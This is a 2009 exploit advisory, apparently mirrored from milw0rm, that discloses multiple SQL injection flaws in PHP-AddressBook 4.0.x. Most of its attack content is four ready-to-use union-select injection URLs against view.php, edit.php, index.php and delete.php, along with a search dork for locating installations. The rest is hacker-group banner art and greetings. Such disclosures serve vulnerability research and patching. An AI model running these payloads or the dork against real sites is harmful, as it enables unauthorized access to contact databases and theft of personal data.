PHP-Address Book 4.0.x - Multiple SQL Injections

🗓️ 26 Jun 2009 00:00:00Reported by YEnH4ckErType
PHP-Address Book 4.0.x - Multiple SQL Injections, web-based contact manage
***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
**					 PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	   MULTIPLE SQL INJECTION VULNERABILITIES	      	             |
|--------------------------------------------------------------------------------------------|
|                              |    PHP-AddressBook v-4.0.X       |  	                     |
|  CMS INFORMATION:	        ----------------------------------	                     |
|										             |
|-->WEB: http://sourceforge.net/projects/php-addressbook/       	                     |
|-->DOWNLOAD: http://sourceforge.net/projects/php-addressbook/		                     |
|-->DEMO: http://php-addressbook.sourceforge.net/demo/   	        		     |
|-->CATEGORY: Address Book                                                                   |
|-->DESCRIPTION: Simple, web-based address & phone book, contact manager & organizer.        |
|		Manage groups, addresses, e-Mails, phone numbers & birthdays...    	     |
|-->RELEASED: 2009-06-13								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3								     |
|-->DORK: "php-addressbook"       					                     |
|-->CATEGORY: SQL INJECTION      				                             |
|-->AFFECT VERSION:  4.0.X				 			             |
|-->Discovered Bug date: 2009-06-16							     |
|-->Reported Bug date: 2009-06-16							     |
|-->Fixed bug date: N/A									     |
|-->Info patch (????): N/A					  			     |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------



Note about versions: Demo is running release 4.0.1, but I didn't find this version to download ( 4.0 is highest).



#####################
////////////////////

SQL INJECTION VULN:

////////////////////
#####################



-----------
EXPLOITS:
-----------



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>




[++]http://[HOST]/[PATH]/view.php?id=-999%27+union+select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14%23




[++]http://[HOST]/[PATH]/edit.php?id=-1%27+union+select%201,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23




[++]http://[HOST]/[PATH]/index.php?alphabet=-1%27+union+all+select+1,2,user(),4,5,6,7,8,9,10,11,12,13,14%23



<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>





[++]http://[HOST]/[PATH]/delete.php?id=-1+UNION+ALL+SELECT+1,@@version,user(),4,5,6,7,8,9,10,11,12,13,14%23




-------------
WATCH VIDEO:
-------------



SQLi --> http://www.youtube.com/watch?v=ON5waxZMnbo




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!




##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################

# milw0rm.com [2009-06-26]
26 Jun 2009 00:00Current
7.4High risk
Vulners AI Score7.4